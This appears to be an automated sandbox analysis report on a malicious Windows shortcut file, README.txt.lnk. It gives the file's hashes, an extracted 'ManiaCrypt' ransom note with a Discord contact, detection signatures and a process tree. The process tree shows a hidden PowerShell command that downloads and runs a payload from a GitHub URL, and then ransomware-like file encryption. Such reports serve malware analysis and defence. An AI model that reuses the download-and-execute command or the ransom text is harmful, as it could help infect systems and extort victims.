Resubmissions

26-01-2025 14:47

250126-r5ypsstrbv 10

19-01-2025 12:07

250119-palewaxlbp 10

Analysis

  • max time kernel
    22s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26-01-2025 14:47

General

  • Target

    README.txt.lnk

  • Size

    1KB

  • MD5

    e1cff745a65a199bdf9dfebe3f69e3f7

  • SHA1

    8c77e01ceb0ff774a66afa5b7a32b0735e422e9e

  • SHA256

    3b497ec4d80770a5172a72f871528397fde8ea5969aa2c3cde98edb0a6946355

  • SHA512

    7e9204f24290dfdff14200945a31b7d3421122f3fb526845a8250e4325751af5fac226057becf1d0d381f021cca6aae7f6fe0b2d2b517c3441006423de03496c

Malware Config

Extracted

Path

C:\RlWCfyLxZ.README.txt

Ransom Note
========================================
!!! ATTENTION !!!
Your Files Have Been Encrypted by ManiaCrypt
========================================

What Happened?
--------------
All of your important files, documents, photos, and databases have been encrypted using RSA. Without our decryption program, your files cannot be restored.

Why Trust Us:
--------------------
If we dont give you the decryption program after payment, nobody will trust us.

What You Need to Do:
--------------------
To get the decryption program, you must contact us.

Steps to Restore Your Files:
----------------------------
1. Open Discord and add the username ballets4.
2. Send us a message and mention your situation.
3. We will provide further instructions for obtaining the decryption program.

Important Information:
-----------------------
- DO NOT attempt to recover your files using third-party tools. They may damage your data and make recovery impossible.
- DO NOT rename, move, or modify the encrypted files. This will also make decryption impossible.
- Only we have the tools required to decrypt your files safely and effectively.

We are waiting for your message. Time is critical.

========================================
Your Files. Your Responsibility.
========================================

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Lockbit family
  • Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
  • Renames multiple (607) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 2 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Control Panel 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\README.txt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4264
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start notepad.exe & powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4744
      • C:\Windows\system32\notepad.exe
        notepad.exe
        3⤵
          PID:4904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3888
          • C:\Users\Admin\91qsdf.exe
            "C:\Users\Admin\91qsdf.exe"
            4⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • System Location Discovery: System Language Discovery
            • Modifies Control Panel
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3668
            • C:\Windows\splwow64.exe
              C:\Windows\splwow64.exe 12288
              5⤵
              • Drops file in System32 directory
              PID:4944
            • C:\ProgramData\E996.tmp
              "C:\ProgramData\E996.tmp"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5092
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\E996.tmp >> NUL
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2708
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
      1⤵
        PID:4548
      • C:\Windows\system32\printfilterpipelinesvc.exe
        C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
        1⤵
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:2316
        • C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
          /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{FC5A6C9C-E737-40A0-89DF-C62557EAC8F0}.xps" 133823764585760000
          2⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of SetWindowsHookEx
          PID:2380

Network

MITRE ATT&CK Enterprise v15

Downloads